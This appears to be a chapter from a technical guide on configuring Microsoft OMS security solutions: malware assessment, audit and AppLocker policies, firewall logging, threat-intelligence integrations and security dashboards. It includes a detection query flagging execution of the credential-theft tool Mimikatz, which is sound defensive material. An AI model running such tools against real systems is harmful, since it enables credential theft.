Operations Management Suite (OMS): Security & Compliance

Introduction

Security has become an even more important topic in the last decade, due in part to several public security breaches of well-known companies. These security breaches increase every year not only in number but in size as well, and the threat actors have grown more sophisticated (skilled, funded, and organized) over time. To be able to prevent, detect and intercept such breaches in time, we need to incorporate new tools and methods. Operations Management Suite (OMS) has a security offering that consists of a couple of solutions, and also integrates with a few other solutions that are part of Insights & Analytics offering.

In this chapter, we will go through the Antimalware Assessment and Security and Audit solutions. Additionally, we will see how we can leverage Log Analytics for auditing PowerShell and Windows Firewall port rules. By learning how to use these OMS solutions you will be able to improve your organizations security posture.

Malware Assessment

The Malware Assessment solution identifies which servers are infected with malware or in risk of infection in your environment. To provide malware status, the machines that are added in OMS must have one of the following agents installed:

  • Windows Defender on Windows 8, Windows 8.1, Windows 10, and Windows Server 2016 or later
  • System Center Endpoint Protection (v4.5.216 or later)
  • Azure virtual machines with the antimalware extension
  • Windows Malicious Software Removal Tool (MSRT)
  • Symantec Endpoint Protection 12.x and 14.x versions
  • Trend Micro Deep Security version 9.6

The Microsoft Monitoring Agent (MMA) reads antimalware protection status and detected threats on servers with those agents, and then sends the data to Log Analytics for processing. From Log Analytics, the data can be queried to show protection and threat status for the monitored systems.

Note: Windows Management Framework (WMF) 3.0 or later is required on the servers where any of the listed agents are installed.

Follow these steps to add Antimalware Assessment solution.

  1. Browse to OMS portal at https://www.mms.microsoft.com.
  2. In OMS Portal, click on Solutions Gallery.
  3. Click on the Antimalware Assessment solution.
  4. On the Antimalware Assessment page, click Add, as shown in Figure 1.

FIGURE 1. ANTIMALWARE ASSESSMENT SOLUTION

  1. Malware Assessment will appear as a tile in Overview page.

Note: Antimalware Assessment solution can be deployed via Azure marketplace as well.

One of the prerequisites of using Antimalware Assessment solution is to have a machine connected to OMS that has a supported agent installed. Follow these steps to install the antimalware extension on the Azure VM.

  1. Browse to the Azure Portal, https://portal.azure.com
  2. In the Azure Portal, click Virtual Machines (classic) or Virtual Machines, depending if your Azure VM is version 1 or version 2.
  3. Click on the VM to which you will add Microsoft antimalware extension.

Note: The VM must also be connected to OMS with Microsoft Monitoring Agent or through System Center Operations Manager.

  1. From Settings, click on Extensions.
  2. From the Extensions blade, click on Add, as shown in Figure 2.

FIGURE 2. EXTENSIONS BLADE

Note: If your Azure VM is Windows Server 2016 there is no need to install Microsoft Antimalware extension as Windows Defender is part of the OS.

  1. In the New resource blade, choose Microsoft antimalware.
  2. On Microsoft antimalware blade, click on Create.
  3. In Install Extension blade, input the following settings and click OK.

    Excluded Files and Locations:

    Excluded File and Locations:

    Excluded File Extensions:

    Excluded Processes:

    Real-Time Protection: Enabled

    Run A Scheduled Scan: Enabled

    Scan Type: Full

    Scan Day: Saturday

    Scan Time: 120

  4. Verify that the extension is listed after the task is executed successfully, as shown in Figure 3.

FIGURE 3. MICROSOFT ANTIMALWARE EXTENSION

Once you add the Antimalware Assessment solution, you will start to see malware related data in OMS whether you have machines with supported antimalware agents or not. Those machines that do not have a supported antimalware agent will be reported with status "No Real Time Protection".

Follow these steps to search Antimalware Assessment Data.

  • Browse to OMS portal at https://www.mms.microsoft.com.
  • On the Overview page, click on the Antimalware Assessment tile, as shown in Figure 4.

FIGURE 4. ANTIMALWARE OVERVIEW TILE

  • The Antimalware Assessment page will be opened, as shown in Figure 5.

Depending on your environment you may see different results.

  • Date/time range. Data shown in this page is scoped for the last 1 day. Scope can be changed from the top menu. Clicking on a result or chart will take you to Search with the query behind this data.
  • Threat status. The Threats status dashboard will show computers that have active or remediated threats. The Detected threats dashboard visualizes the types of threats that are present in your environment.
  • Protection status. The Protection status dashboard will show the number of computers with different protection status. The Type of protection dashboard will list the malware agents present on your computers.

FIGURE 5. ANTIMALWARE ASSESSMENT DASHBOARDS

  • Click on Overview and then Log Search.
  • In the Search bar, type the query below and press Enter.

    Type=ProtectionStatus

  • The query will show all data for Antimalware Assessment solution in the last 1 day, as shown in Figure 6.
    • Fields like ThreatStatusRank and ProtectionStatusRank show the malware status of the machine in numbers.
    • These fields have corresponding fields ThreatStatus and ProtectionStatus that show the status of the machines in readable text.
    • The TypeofProtection field designates what anti-malware agent is installed.

FIGURE 6. MALWARE ASSESSMENT DATA

  • In the Search bar, type the query below and press Enter.

Type:ProtectionStatus TimeGenerated>NOW-2HOUR | measure max(ProtectionStatusRank) as Rank by DeviceName | where Rank>=270

  • The query will find the machines that have reported no anti-malware protection in the last 2 hours, as shown in Figure 7.

FIGURE 7. MACHINES WITH NO ANTI-MALWARE PROTECTION

  • Logon via remote desktop to the machine where you've installed Azure VM Microsoft antimalware extension, System Center Endpoint Protection (SCEP) agent or Windows Defender.
  • Create empty txt file. Open the txt file with Notepad.
  • Browse http://www.eicar.org/86-0-Intended-use.html and copy the sample text from the web page to the text file opened in Notepad, as shown in Figure 8.

Note: The copied text from http://www.eicar.org/86-0-Intended-use.html is not real malware. It serves as a test. Complete description is provided on the web page.

FIGURE 8. ANTI-MALWARE TESTFILE

  • Save the text file. The SCEP agent will detect the file as malware threat and remove it.
  • Browse to the OMS site at https://www.mms.microsoft.com.
  • Click on Antimalware Assessment tile.
  • The Malware threat will be listed, as shown in Figure 9.

Note: Antimalware Assessment data is gathered on an hourly interval.

FIGURE 9. MALWARE THREAT

  • Click on the computer name with the threat.
  • Log search will be opened with a query giving more detailed results for the threat, as shown in Figure 10.

FIGURE 10. MALWARE THREAT DETAILS

  • Clicking on View after the value of the Threat field will open web page with detailed information about that malware.

Note: Currently, threat detection does not work for Symantec Endpoint Protection and Trend Micro Deep Security agents.

Security and Audit

Security and Audit is a solution that helps in performing forensic analysis, security breach pattern investigation, threat detection and auditing capabilities. Data for Security and Audit is ingested from various sources, depending on the type of node. For Windows machines, security data is collected from Security Event log, Windows Firewall log and AppLocker event log. For Linux machines, security data is collected from syslog. As soon as data is generated in those logs, it is sent to the OMS service. Additionally, security baselines scans are performed every day for Windows machines. The solution is partially functional just by your adding it to your OMS workspace, but some additional configurations are required for full functionality. One such functionality is a feature named Malicious IP. The Windows Firewall logs log information about communication with Public IP addresses. On an hourly basis, OMS connects to Microsoft Threat Intelligence Center (MSTIC) and gets the latest information on Public IP address that are related to suspicious activities. The MSTIC team works with various threat intelligence partners to gather and provide this consolidated list to the OMS service. OMS will match the data from MSTIC to the Public IPs your servers are communicating with. That joined data is exposed in OMS and can be searched. For those Malicious IPs, information like Threat type and Threat Description is available in the fields returned. Other solutions, like Wire Data 2.0 and IIS logs also gather network communication data. When those solutions are added, they can increase the effect of this intelligence by providing more information.

Note: Security event log generates high velocity data. This requires the data to be send immediately to the OMS service. When SCOM is used as data source, the data is not forwarded to the SCOM Management server and from there uploaded to OMS but rather it is send directly from the Microsoft monitoring agent to the OMS service. This behavior prevents performance issues on the SCOM Management Server.

Follow these steps to add Security and Audit solution.

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. In OMS Portal click on Solutions Gallery.
  3. Click on Security and Audit solution.
  4. On Security and Audit page click Add, as shown in Figure 11.

FIGURE 11. SECURITY AND AUDIT SOLUTION PAGE

Note: You can add Security and Audit solution from Azure Marketplace as well. If you deploy Security & Compliance from either Azure or OMS portal the solution will be deployed along with it.

  1. Security and Audit will appear as tile in Overview page. It can take a couple of minutes until the tile displays some information.
  2. From Overview page click on Security and Audit tile.
  3. The first time you open the solution dashboards you will be asked to enable a few default alerts, as shown in Figure 12.

FIGURE 12. SECURITY AND AUDIT SOLUTION DEFAULT ALERTS

  1. Click Enable Alerts. You can modify, disable, or delete those alerts later in Settings Alerts page.

Settings, Configurations, and Integrations

Security and Audit Solution Settings

Security and Audit solution offers centralized settings for what Windows events will be collected. Execute the steps below to configure Security and Audit solution settings:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. In Overview page click on Settings.
  3. From Solutions tab click on Security and Audit, as shown in Figure 13.

FIGURE 13. SETTINGS PAGE – SOLUTIONS

  1. Click on Settings inside Security and Audit solution, as shown in Figure 14.

FIGURE 14. SECURITY AND AUDIT SOLUTION

  1. Click on Common and Save, as shown in Figure 15.

FIGURE 15. SECURITY AND AUDIT SETTINGS

  1. Return to Security and Audit Settings.
  2. Select All Events and click Save.

Table 1 provides information for all available options in Security and Audit settings.

Setting

Description

Windows Security Event IDs

AppLocker event IDs

All events

OMS will collect all Windows Security and AppLocker event logs. For customers who want to make sure all events are collected.

all

all

Common

OMS will collect a standard set of events to enable common security and audit tasks. This is a set of events that will satisfy most customers and allow them a full audit trial.

1102, 4626, 4625, 4657, 4663, 4688, 4700, 4702, 4719, 4720, 4722, 4723, 4724, 4727, 4728, 4732, 4735, 4737,4739, 4740, 4754, 4755, 4756, 4767, 4825, 4946, 4948, 4956, 5024, 5033, 299, 300, 324, 340, 403, 404, 410, 411, 412, 413, 431, 500, 501, 1100, 1107, 1108, 4608, 4610, 4611, 4614, 4616, 4622, 4634, 4647, 4648, 4649, 4658, 4661, 4662, 4665, 4666, 4667, 4670, 4673, 4674, 4675, 4689, 4690, 4697, 4704, 4705, 4716, 4717, 4718, 4725, 4726, 4729, 4733, 4738, 4742, 4744, 4745, 4746, 4750, 4751, 4752, 4757, 4760, 4761, 4762, 4764, 4768, 4771, 4774, 4778, 4779, 4781, 4793, 4797, 4798, 4799, 4800, 4801, 4802, 4803, 4826, 4870, 4886, 4887, 4888, 4893, 4898, 4902, 4904, 4905, 4907, 4931, 4932, 4933, 4985, 5059, 5136, 5137, 5140, 5145, 5632, 6144, 6145, 6272, 6273, 6278, 8222, 26401, 30004

8001, 8002

Minimal

OMS will collect the minimal set of events that are required for threat detections. By enabling this option, you won't be able to have a full audit trail. A smaller set of events for customers who want to minimize the event volume.

1102, 4626, 4625, 4657, 4663, 4688, 4700, 4702, 4719, 4720, 4722, 4723, 4724, 4727, 4728, 4732, 4735, 4737,4739, 4740, 4754, 4755, 4756, 4767, 4825, 4946, 4948, 4956, 5024, 5033

8001, 8002

None

No security or AppLocker events will be collected. Security and Audit solution will only present data based on agent assessment, such as Antimalware, Security Baseline, and Update. For customers who choose this option, their security dashboards will have only Windows Firewall logs and proactive assessments like antimalware, baseline, and update.

None

None

TABLE 1. SECURITY SETTINGS

Configure Audit Policies on Windows Servers

If you have configured OMS to gather All events from Security and Audit settings, you will still need to configure what kind of auditing events are being logged on your Windows servers. This is configured through Windows audit policies. More security events can be enabled or disabled through policies thus providing more or less data in OMS and visibility into your environment. The steps below walk through configuring audit policies in domain group policies, but the same steps can be executed with local group policies as well.

Follow these steps to configure advanced audit policies.

  1. Login to an Active Directory domain controller into your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
  5. Expand Computer Configuration, Policies, Windows Settings, Security Settings, Advanced Audit Policy Configuration, Audit Policies, as shown in Figure 16.

FIGURE 16. ADVANCED AUDIT POLICIES

  1. Under the Audit Policies tree, there are 10 categories of audit policies, each containing a few policies. Each policy can be configured for success and/or failure events.
  2. Enable the policies according to the recommendations in https://technet.microsoft.com/en-us/library/dn487457.aspx provided by Microsoft or according to your organization's requirements.
  3. Close the Group Policy Management Editor.
  4. The same steps can be executed for the Default Domain Controller Policy to customize audit policies for the Active Directory domain controllers in your environment.

Configure AppLocker Audit Policies

AppLocker audit events need to be configured to provide you with information what executables, installers scripts, and packages are used in your environment. That data can be used to find executables that are running in your environment.

Follow these steps to configure AppLocker Policies for Audit Only.

  1. Logon to an Active Directory domain controller into your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
    1. Expand Computer Configuration, Policies, Windows Settings, Security Settings, Application Control Policies, AppLocker, as shown in Figure 17.

FIGURE 17. APPLOCKER POLICIES

  1. Right-click on AppLocker and select Properties.
  2. Enable Audit Only policy on all rules, as shown in Figure 18 and click OK.

FIGURE 18. APPLOCKER PROPERTIES

  1. Right-click on Executable rules and select Create Rule. The Create Executable Rules Wizard starts.
  2. On Before You Begin Page, click Next.
  3. On Permissions page, select Allow for Action and Everyone for Group. Click Next.
  4. On Conditions page, select Path and click Next.
  5. On Path page, enter *, as shown in Figure 19 and click Next.

FIGURE 19. CREATE EXECUTABLE RULES WIZARD

  1. On Exceptions page, click Next.
  2. On the Name page, enter "Allow all files" for Name and click Create.
  3. Repeat steps 8 to 15 for the other three categories – Windows Installer Rules, Script Rules, and Packaged App Rules.
  4. Expand Computer Configuration, Windows Settings, Security Settings.
  5. Select System Services.
  6. In details pane double click on Application Identity.
  7. In Application Identity Properties, configure the service to start automatically.
  8. Repeat steps from 4 to 20 for Default Domain Controller Policy.
  9. Close the Group Policy Management Editor.
  10. Wait until policies are applied or force group policy update. You can force a group policy update from the command line by typing gpupdate /force.

Configure Windows Firewall Log Policies

Windows Firewall Log Policies are also not configured by default like AppLocker policies. You will need to configure them in order OMS agent to collect them in Log Analytics through Security and Audit solution.

Follow these steps to configure Windows Firewall Log Policies.

  1. Logon to an Active Directory domain controller into your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
    1. Expand Computer Configuration, Policies, Windows Settings, Security Settings, Windows Firewall with Advanced Security, as shown in Figure 20

FIGURE 20. WINDOWS FIREWALL WITH ADVANCED SECURITY POLICIES

  1. Right-click on Windows Firewall with Advanced Security and select Properties.
  2. On Domain Profile tab, on Logging section click Customize
  3. Enter the settings shown in Figure 21 and click OK.

FIGURE 21. LOGGING SETTINGS FOR WINDOWS FIREWALL PROFILES

  1. Repeat steps from 7 to 8 for Private Profile and Public Profile.
  2. Repeat steps from 4 to 9 for Default Domain Controller Policy.
  3. Close the Group Policy Management Editor.

Configure Microsoft Advanced Threat Analytics Integration

Advanced Threat Analytics (ATA) is an on-premises platform that helps protect your enterprise from multiple types of advanced targeted cyber-attacks and insider threats by using information from multiple data-sources in your network to learn the behavior of users and other entities in the organization and build a behavioral profile about them and by leveraging ATA's proprietary network parsing engine to capture and parse network traffic of multiple protocols. Microsoft ATA functionality is similar to Threat Detection feature in Security and Audit solution. ATA will log any suspicious activities and when the integration with Log Analytics is setup the information for those activities will appear in SecurityDetection type along with Threat Detections from Security and Audit solution.

Execute the following steps to setup the integration with Microsoft ATA:

  1. Make sure that you have Microsoft Monitoring Agent installed on your Microsoft ATA server and connected to Log Analytics Workspace.
  2. Make sure that Security and Audit solution is enabled for that same Log Analytics Workspace.
  3. Logon to Microsoft ATA server and start Microsoft ATA Console
  4. Navigate to Configuration -> Notifications -> Syslog server, as shown in Figure 22.

FIGURE 22. MICROSOFT ATA CONSOLE

  1. Enter the following configuration, as shown in Figure 23 and click Save.

Syslog server endpoint: 127.0.0.7: 5114

Transport: UDP

Format: RFC5424

FIGURE 23. SYSLOG SERVER CONFIGURATION

  1. In Notifications click on Settings.
  2. Enable all Syslog notifications, as shown in Figure 24.

FIGURE 24. SYSLOG NOTIFICATIONS

  1. Restart Microsoft Monitoring Agent service on the ATA server.
  2. When new suspicious activity is registered by ATA server it will appear as well in Log Analytics, as shown in Figure 25 and 26.

FIGURE 25. MICROSOFT ATA SUSPICIOUS ACTIVITY

FIGURE 26. MICROSOFT ATA SUSPICIOUS ACTIVITY IN OMS

Note: You may see the same activities logged twice but with different provider field value. Initially, basic integration was provided between OMS Log Analytics and Microsoft ATA. That basic integration is still active but it will be deprecated in the future. Events from that old integration are logged with Provider field value Microsoft ATA, where the new integration is using Advanced Threat Analytics value.

Configure Common Event Format (CEF) Logs Integration

The Security and Audit solution can be integrated with 3rd party devices and systems that generate Common Event Format (CEF) logs. In such a scenario, you will have the 3rd party system which sends syslog events to a Linux-based machine that is connected to your OMS Log Analytics workspace. The Linux-based machines receives the syslog events and forwards them to the workspace. Basically, the Linux machine acts as forwarder.

Execute the steps below to ingest logs from Cisco ASA device to Log Analytics:

  1. Login via SSH to an OMS supported Linux machine that will be the forwarder. In our case, we are using Ubuntu 14.04 LTS.
  2. The Linux machine should have the OMS agent installed and connected to your workspace.
  3. The Security and Audit solution should be enabled for that same workspace.
  4. Open omsagent.conf file in an editor to edit its contents. The command below uses vi editor to edit the file.

    sudo vi /etc/opt/microsoft/omsagent/conf/omsagent.conf

  5. Locate the following settings and change them, as shown in Figure 27. num_threads 10 buffer_queue_limit 30 max_retry_wait 300s retry_wait 2s

FIGURE 27. OMSAGENT.CONF FILE

  1. By default, the OMS Agent for Linux can handle a throughput of 500 messages/second. This configuration increases it to 2000 messages/second. Press ESC key and enter :wq to save the file.
  1. Navigate to omsagent.d folder with the command below. Replace <workspace id> with your own value. cd /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.d/
  2. In omsagent.d folder create a file named security_events.conf. sudo vi cisco-config-omsagent.conf
  3. Enter the following content in it, as shown in Figure 28.

<source>

type syslog

port 25225 bind 0.0.0.0 protocol_type udp tag oms.security

format /^(?<time>(?:\w+ ){2,3}(?:\d+:){2}\d+):? ?(?:(?<host>[^: ]+) ?:?)? (?<ident>[a-zA-Z0-9_%\/\.\-]*)(?:\[(?<pid>[0-9]+)\])?: *(?<message>.*)$/

</source>

<filter oms.security.**> type filter_syslog_security

</filter>

FIGURE 28. SECURITY_EVENTS.CONF FILE

10. This will tell the OMS agent to listen on the specified port for syslog events being send, format the appropriately and forwards them to Log Analytics workspace.

Press ESC key and enter :wq to save the configuration.

Note: In this example, we've modified security_events.conf to be different from the proposed one located at https://github.com/Microsoft/OMS-Agent-for-Linux/blob/master/installer/conf/omsagent.d/security_events.conf . In the example given from OMS Agent for Linux repository, the syslog events are first send to rsyslog or syslog-ng service and then forwarded to the OMS agent. In our example, I am using solution proposed by Daniele Grandini (https://nocentdocent.wordpress.com/2016/09/14/msoms-collecting-cisco-asa-events-the-right-way/ ) where syslog events are directly send to the OMS agent.

  1. Restart the OMS agent. sudo /opt/microsoft/omsagent/bin/service_control restart
  2. Logon to your 3rd party device.
  3. Enable logging on your device if is not enabled, as shown in Figure 29.

FIGURE 29. ENABLE LOGGING

  1. Add the Linux machine as syslog server. The IP Address is the IP of the Linux machine, the protocol is UDP and the port is 25225, as shown in Figure 30.

FIGURE 30. ADD SYSLOG SERVER

  1. Configure the severity level that will be send to the syslog servers, as shown in Figure 31.

FIGURE 31. ADD SYSLOG SERVER SEVERITY CONFIGURATION

  1. Configure to include timestamp and hostname in the syslog events, as shown in Figure 32.

FIGURE 32. CONFIGURE TIMESTAMP AND HOSTNAME

  1. Apply all configurations and Save them.
  2. On the Linux machine, you can check the oms agent for errors with the following command. Replace <workspace id> with your own. tail /var/opt/microsoft/omsagent/<workspace id>/log/omsagent.log
  3. After several minutes the syslog events from the 3rd party device will appear in Log Analytics under CommonSecurityLog type, as shown in Figure 33.

FIGURE 33. COMMONSECURITYLOG TYPE

Some steps in this scenario are specific to Cisco ASA device but most of them are generic and can be used to forward events from any 3rd party device that supports CEF format.

Note: The full documentation on this scenario is available at https://github.com/Microsoft/OMS-Agent-for-Linux/blob/master/docs/Security-Events-Preview-Configuration.md .

Linux Auditd Integration

In Windows, we have the Windows Security Event log to collect security events and audit Windows based systems. Linux has a similar capability called Linux Auditing System, also known as Auditd. Auditd allows you to create an audit trail, which is basically a log for every action on the server. Security-relevant events can be recorded via Auditd. These events can be analyzed for malicious or unauthorized activities. The OMS team is currently working on integration with Auditd for the Security and Audit solution and in this section, we will have a glimpse of what that integration looks like.

In the steps below, we will go through a scenario where we have Linux machine configured with Auditd and logs are ingested into Log Analytics. On that Linux machine, a successful brute force attack is being made, some executables are downloaded and then executed to perform malicious actions.

  1. In Figure 34 we see login attempts to two different Linux machines.

FIGURE 34. LOGIN ATTEMPS ON LINUX MACHINES LOG

  1. In Figure 35, we investigate one of the login attempts that is successful and we can see all the information that comes in such a record. The records states that it was an SSH login from specific IP and it was successful.

FIGURE 35. SUCCESSFUL LOGIN ATTEMPT ON LINUX MACHINE

  1. In Figure 36 we see that audit EXECVE record type is created for wget process.

FIGURE 36. WGET EXECUTED RECORD

  1. A record of this type is generated with every process creation and there are a total of 6 records generated for this type of event. Figure 37 shows all 6 records and notice that they share the same audit id.

FIGURE 37. PROCESS CREATION RECORDS

  1. With the query in Figure 38, we get all the processes that are being executed on the machine. That way, we can track what kind of malicious software was executed on the attacked machine.

FIGURE 38. ALL EXECUTED PROCESSES

The simple scenario above illustrates the kind of audit data is being collected by Log Analytics. We can easily imagine how in the near future this data can be used for further integration with Security and Audit solution where we can be notified about threat detections and notable security issues appearing in our Linux environments.

Note: Auditd integration is currently in private preview.

Configure Additional Solutions and Data Sources

To take full advantage of the Security and Audit solution, the following data sources or solutions need to be configured as well:

  • Enable Update Management Solution
  • Enable and configure Wire Data 2.0 solution
  • Enable Antimalware Assessment solution
  • Collect IIS logs
  • Enable DDI Analytics Solution

Dashboards

When we take a walk through the dashboards in Security and Audit solution in the next sections, we will explain which ones visualize data from which sources.

Execute the steps below to navigate to Security and Audit solution dashboards:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile, as shown in Figure 39.

FIGURE 39. SECURITY AND AUDIT TILE

  1. A page with multiple dashboards will open, as shown in Figure 40.

FIGURE 40. SECURITY AND AUDIT DASHBOARDS

The dashboards are divided into four groups: Security Domains, Notable Issues, Detections, and Threat Intelligence.

Security Domains

In Security Domains group, there are 8 tiles and one dashboard. The dashboard shows the number of security events over time. Counted are all the records present in SecurityEvent type. Windows security events are registered to this type. You can click on the dashboard to visualize the data in a bigger chart.

1 Antimalware Assessment

When you click on the Antimalware assessment, tile it will lead you to the same dashboards available from Antimalware solution we covered earlier in this chapter. The benefit of this shortcut is that you have all your security data into centralized dashboard.

2 Update Assessment

The Update Assessment tile leads to the dashboards for Update Management solution.

This solution was covered in "Chapter 5: Change and Update Management".

3 Network Security

The Network Security Tile leads to dashboards showing network data from different sources in the context of security. The Wire Data 2.0 solution feeds most of the dashboards in this view. Wire Data 2.0 stores its data as type WireData. Additionally, data from types W3CIISLog (IIS log ingestion), WindowsFirewall (Windows Firewall log ingestion), CommonSecurityLog (Common Event Format and Cisco ASA log ingestion) and DnsEvents (DDI Analytics solution) are also used for data related to Malicious IP communication.

Execute the steps below to explore Network Security dashboards:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile.
  3. Click on Network Security tile.
  4. Another set of dashboards will load, as shown in Figure 41.

FIGURE 41. NETWORK SECURITY DASHBOARDS

  1. The dashboards are divided in 4 groups:
    1. Network Security Context. General network data like inbound and outbound communications in your environment. The blue arrows indicate trends compared to the previous day. You can click on each tile of this group which will lead you to the query behind those numbers and visualizations.
    2. Malicious Communication. Lists any commutation with Malicious IPs like botnets, malware, darknets, etc, happening on your servers. These should be regularly investigated. Inbound communication can signal attacks or probes made towards your servers and applications. Outbound commutation signals that you may have compromised servers in your environment.
    3. Top Active Computers. Lists servers with most traffic and sessions.
    4. Top Destinations. Lists with IPs with which your servers have communicated most frequently.
  2. Click on the pie chart of Malicious communications, as shown in Figure 42.

FIGURE 42. MALCIIOUS IPS DATA

  1. The query will provide more information on the Malicious IPs that are communicating with servers in your environment.
  2. Review which fields are available specifically for Malicious IP.
  3. Review the query that was generated to list the data.

Note: Malicious IP data is inserted for Wire Data logs, IIS logs, Windows Firewall logs and Common Security Logs. These logs are scanned on a regular interval and if any inbound or outbound communication is found with a malicious IP, additional data is inserted into the records of those logs. That additional data is represented with fields like MaliciousIP, IndicatorThreatType, TLPLevel, Confidence, IsActive, etc.

4 Identity and Access

Identity and Access security domain leads to a group of dashboards that can immediately assist you in identifying potentially suspicious activities. By monitoring your identityrelated activities, you will be able to take proactive steps before an incident takes place or reactive actions to stop an attack attempt.

Execute the steps below to explore Identity and Access dashboards:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile.
  3. Click on Identity and Access tile.
  4. Another set of dashboards will load, as shown in Figure 43.

FIGURE 43. IDENTITYT AND ACCESS DASHBOARDS

  1. The dashboards are divided in 3 groups.
    1. Identity Posture. General information like Failed vs. Successful logins percentage, Successful and Failed logins trends, Locked accounts, Accounts with changed/reset password, etc.
    2. Failed Logins. breaks down the reasons for failed logins and which are the accounts with most failed logins.
    3. Logons over time. Breaks down failed and successful logins in computer context.
  2. From Failed Logons group, you can easily identify accounts against which brute force attack has been used.
  3. When you click on account from the list, you will be redirected to Search for more data, as shown in Figure 44.

FIGURE 44. FAILED LOGINS - AZURE ACCOUNT

  1. In Figure 44 you can find out which computers are being targeted. All the data for these dashboards comes from Windows Security event log events, which are stored as type SecurityEvent.
5 Computers

This tile can be used to access the number of computers that are reporting with the different security log types, as shown in Figure 45.

FIGURE 45. NUMBER OF COMPUTERS BY SECURITY LOGS

To view better summarization of security data by computer, execute the following steps:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Search.
  3. Execute the query below. Type=SecurityEvent | measure count() by Computer
  4. Click on Computer Security view, as shown in Figure 46.

FIGURE 46. COMPUTER SECURITY BIEW

You can use this view to get quick security summary per computer.

6 Threat Intelligence

This tile is a shortcut to Threat intelligence dashboard. Threat Intelligence takes advantage of Malicious IP information and visualizes the data from on interactive map, as shown in Figure 47.

FIGURE 47. THREAT INTELLIGENCE DASHBOARD

When you click on the map on malicious incoming or outgoing traffic, you will get additional information, such as an overview of the threat and maybe even link to full report, as shown in Figure 48.

FIGURE 48. THREAT INTELLIGENCE REPORT

Additionally, you can zoom in and out on the map, click on the results on the threat breakdown dashboard group or threat details group. Malicious IP is produced the same way as explained earlier in this chapter.

7 Baseline Assessment

The Baseline Assessment tile leads to the Security Baseline Assessment dashboard.

Microsoft, together with industry and government organizations worldwide, defines a Windows configuration that represents highly secure server deployments. Such a configuration is represented by registry keys, audit policy settings, and security policy settings and their recommended values from Microsoft on the Windows operating system. This set of rules is known as a Security baseline. The Security and Audit solution has all this information and will scan your computers on the state of these settings.

Note: Security Baseline Assessment currently works on Windows Server 2008 R2 and above. Support for Linux is planned for future release as described at https://blogs.technet.microsoft.com/msoms/2016/08/12/use-oms-security-to-assess-the-security-configuration-baseline/ .

Execute the steps below to explore the Security Baseline Assessment feature:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile.
  3. Click on Baseline Assessment tile.
  4. Another set of dashboards will load, as shown in Figure 49.

FIGURE 49. SECURITY BASELINE ASSESSMENT DASHBOARDS

  1. The dashboards are divided in 3 groups.
    1. Computers compared to baseline. This group gives a summary of the computers assessed and what is the average pass score for them. You will also get top 10 computers with lowest pass score.
    2. Required rules status. This group focuses on the failed rules. You can see summarization of the failed rules by severity and type. You will also get top 10 failed rules.
    3. Computers missing baseline assessment. this group lists the computers that were not assessed due to operating system incompatibility or failures.
  2. Click on Computers Assessed tile to get more detailed information.
  3. As shown in Figure 50, there will be a list of computers and their percentage passed rules values.

FIGURE 50. SECURITY BASELINE ASSESSED COMPUTERS

  1. Change the query to Type=SecurityBaselineSummary, as shown in Figure 51. As you can see there is summary of information about the rules for every computer. This information is stored in SecurityBaselineSummary type and it is being collected every 24 hours.

FIGURE 51. SECURITYBASELINESUMMARY TYPE

  1. Return to Security Baseline Assessment dashboards.
  2. Click on one of the failed security rules.
  3. As shown in Figure 52 you will notice that Security Baseline Rules have their own custom view for easier viewing.

FIGURE 52. SECURITY BASELINE RULE VIEW

  1. From Figure 52, you can find all the information about this rule like full description, potential impact, countermeasures, vulnerability, the setting for the rule, expected value for compliance and what is the default value.
  2. Click on List and expand the first record, as shown in Figure 53.

FIGURE 53. FAILED SECURITY BASELINE RULE

  1. Security Baseline rules results are recorded as type SecurityBaseline. You can see the information about the rule on each computer where it failed. Note that you can see what is the expected setting and the actual setting on the computer. Every rule is assessed on a 24-hour interval. You will notice different rules are assessed at different times of the day to avoid affecting operating system performance.

Azure Automation Configuration Management can be used for applying these rules and making sure is no drift in desired configuration. The Security and Audit solution will make sure you are compliant with all the baseline rules. Once a computer becomes compliant with a rule, upon the next scan this will be reported in the security baseline summary for that computer.

8 Azure Security Center

The Azure Security Center tile is just a shortcut to Security Center in Azure portal.

Notable Issues

Notable issues help you identify potential issues in your environment. Each issue is assigned and grouped by severity, as shown in Figure 54.

FIGURE 54. NOTABLE ISSUES DASHBOARD

There are 3 types of severities: Critical, Warning and Info. Some of these issues are already covered in the different dashboards of the Security and Audit solution. This dashboard visualizes the most important ones. Behind each notable issue, there is query that is being executed when the dashboard is loaded. These queries are saved in 3 saved search categories, as shown in Figure 55.

FIGURE 55. NOTABLE ISSUES QUERIES

The Notable issues dashboard is extensible. If you save a query inside one of those 3 saved searches categories and that query returns results it will show up in the dashboard list.

Execute the steps below to add a Notable issue:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Search.
    1. Enter and execute query: Type=SecurityEvent Process="MIMIKATZ.EXE".

Note: In order to get results, AppLocker auditing must be configured and MIMIKATZ.exe must have been run on a computer.

  1. Click on Save from Top menu, as shown in Figure 56.
  2. For the name, enter MIMIKATZ was executed and for category enter Security Critical Notable Issues, as shown in Figure 56.

FIGURE 56. ADDING NOTABLE ISSUE

  1. Click Save.
  2. Open Security and Audit dashboards.
  3. The added notable issue will appear in the dashboard, as shown in Figure 57.

FIGURE 57. ADDED NOTABLE ISSUE

You can extend this dashboard with queries that target other log types that are not part of the Security and Audit solution.

Detections

Detections is a feature that analyzes the security events and looks for patterns to indicate a threat. At the backend, it is using advanced analytics and techniques like behavioral analysis. As a cloud solution, the built-in security detection logic is updated constantly with new attack patterns. The full list of detections is not disclosed to protect the customers using the solution. Detections are stored in SecurityDetection type. All detections generated from the Security and Audit solution or from the Microsoft Advanced Threat Analytics (ATA) integration will appear in the Detections dashboard, as shown in Figure 58.

FIGURE 58. DETECTIONS DASHBOARD

